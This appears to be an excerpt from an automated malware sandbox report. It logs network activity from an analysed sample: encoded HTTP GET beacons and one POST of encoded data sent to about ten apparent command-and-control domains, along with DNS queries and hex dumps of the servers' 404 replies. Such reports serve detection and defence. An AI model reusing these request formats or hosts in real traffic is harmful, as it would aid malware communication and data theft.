                Source: global trafficHTTP traffic detected: GET /lnl7/?sVC8z=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgfVGx56k02tXkAzZldWa3Ro5vlhsr06JocjtffJpgas7XnA==&PPP=FHWL56 HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.izmirescortg.xyzUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /6xrr/?sVC8z=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBWZyS1GVQka4TzLjh3pjJtHZ6h8tdWKE4MgApWPfIsL675g==&PPP=FHWL56 HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.aballanet.catUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /0mwe/?sVC8z=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN+4NwIpTlqvPWS8Sl4p5VjB9j49JCBEhVmvR6biJ/0AaWeg==&PPP=FHWL56 HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.madhf.techUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /g3h7/?sVC8z=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BXuIfA/6aNcSUPn2xNM4zETNmyU4aFxTXIL5EZw83E41rkQ==&PPP=FHWL56 HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.canadavinreport.siteUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /t322/?PPP=FHWL56&sVC8z=FCfXCbowRdQKA3bKzmWhb/MMDIYWCwffvgnpa1jm1l5RPo8GmzCZxrunal2GKioIIi33qnUs85PYplnvRA3XX9RPs5/iUffq0tmKE8rYJBtcI2bhCRGcMbzPlb/C9uxVPg== HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.yunlekeji.topUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /iuvu/?sVC8z=4GSi4NjhieA+eby0NKQzTEPCPA5td1TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5ynY1PA81WB0aqcrP8TCrRqA4T6i/Y0YCRnlTl6YfLJ6nzbiw==&PPP=FHWL56 HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.logidant.xyzUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /36be/?sVC8z=zT+fCPSXWqCfWPgMnoOydtJKsJuCEtGx9/DVuG0pIlquWt59hgdSk8Rx6eVvndf2YPyLwPhL3z2g/EyQU+U7tD9cl/byRSbJ8t/R3+K3cKRBXN0bJbe4ZjKihmDBlTXN1Q==&PPP=FHWL56 HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.laohub10.netUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /kf1m/?sVC8z=gD/FPiA75bYZCbZDbB+WsVUzjKMJP+r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoRPOyc9x0vhFbku7Ub3qNJZbDXed1slXSq/MHP91YwZ61FA==&PPP=FHWL56 HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.zkdamdjj.shopUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /k1td/?sVC8z=oEMxw+ab8QlEZmTmAbDEuuFmAVWx5xMHQHNpbkBMxCjDr7HlodnZgfFsQKGKkvz/XYzpvPMYep3+sZsYYHcCVG2YOA5cLjPPS3bUYxhUJeAm1ae/P1TsW9+p+FqZ3lrXmQ==&PPP=FHWL56 HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.tals.xyzUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /gn26/?sVC8z=fgpTVhEuh+HnR3p0lfNLmVuUqPxSLN4hCHlB5YwrT5j1SjgoO/sQ0W1xqV3uB3iqP4rffdiJ/shc0ougvjbd7NMKGX1gMLgBVaz3e9231X82jxOqgG++QmJ2h2W7Ejj4Gw==&PPP=FHWL56 HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.brightvision.websiteUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.izmirescortg.xyz
                Source: global trafficDNS traffic detected: DNS query: www.aballanet.cat
                Source: global trafficDNS traffic detected: DNS query: www.madhf.tech
                Source: global trafficDNS traffic detected: DNS query: www.canadavinreport.site
                Source: global trafficDNS traffic detected: DNS query: www.yunlekeji.top
                Source: global trafficDNS traffic detected: DNS query: www.logidant.xyz
                Source: global trafficDNS traffic detected: DNS query: www.laohub10.net
                Source: global trafficDNS traffic detected: DNS query: www.zkdamdjj.shop
                Source: global trafficDNS traffic detected: DNS query: www.tals.xyz
                Source: global trafficDNS traffic detected: DNS query: www.brightvision.website
                Source: unknownHTTP traffic detected: POST /6xrr/ HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brContent-Length: 206Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Host: www.aballanet.catOrigin: http://www.aballanet.catReferer: http://www.aballanet.cat/6xrr/User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36Data Raw: 73 56 43 38 7a 3d 4b 7a 68 67 58 51 68 42 2f 49 47 6c 34 6c 45 42 70 41 51 43 7a 4d 39 54 61 38 62 70 39 76 31 41 32 58 50 77 33 38 6e 73 4f 45 64 35 44 34 44 63 63 41 54 62 45 6d 53 62 4b 45 6e 72 45 32 49 4e 39 36 43 68 55 58 49 4f 41 62 51 74 47 71 46 46 61 75 65 52 65 4c 36 70 34 52 6f 57 6a 4a 5a 35 39 34 58 70 33 4c 2f 41 2f 32 70 37 39 4d 34 2f 54 5a 6f 50 64 7a 6c 43 57 76 71 37 6a 59 2f 41 36 76 70 31 4b 59 5a 56 36 67 4d 52 69 67 6a 5a 50 48 43 4d 61 30 52 72 76 39 2b 68 6d 5a 4d 52 34 68 75 31 5a 58 54 70 51 53 69 58 72 30 44 4f 58 67 33 75 44 6a 6b 45 39 41 68 70 56 55 47 75 6d 38 2b 61 71 47 59 3d Data Ascii: sVC8z=KzhgXQhB/IGl4lEBpAQCzM9Ta8bp9v1A2XPw38nsOEd5D4DccATbEmSbKEnrE2IN96ChUXIOAbQtGqFFaueReL6p4RoWjJZ594Xp3L/A/2p79M4/TZoPdzlCWvq7jY/A6vp1KYZV6gMRigjZPHCMa0Rrv9+hmZMR4hu1ZXTpQSiXr0DOXg3uDjkE9AhpVUGum8+aqGY=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 20:08:57 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7KScnn1MU9%2BxRfTJro3YPICHi4D1YPn%2F1oyO5KNSBtQgkqtWUsJAdU6OK%2FFelyJfisitUXQlrPBxByPwPanZG4SOeGyhWTF9oWULlFHZKn5zWfvPEZoc977ttt9Tybp3Y5%2FkUGn4%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e5b132f0d1942e7-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1661&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=373&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 20 Nov 2024 20:10:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 31 39 66 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e5 8f 91 e7 94 9f e9 94 99 e8 af af 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 36 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 31 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 32 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 32 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 65 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 33 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 62 62 72 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 75 72 73 6f 72 3a 20 68 65 6c 70 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 20 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 20 Nov 2024 20:10:18 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 20 Nov 2024 20:10:20 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 20 Nov 2024 20:10:23 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 20 Nov 2024 20:10:26 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 20:11:19 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 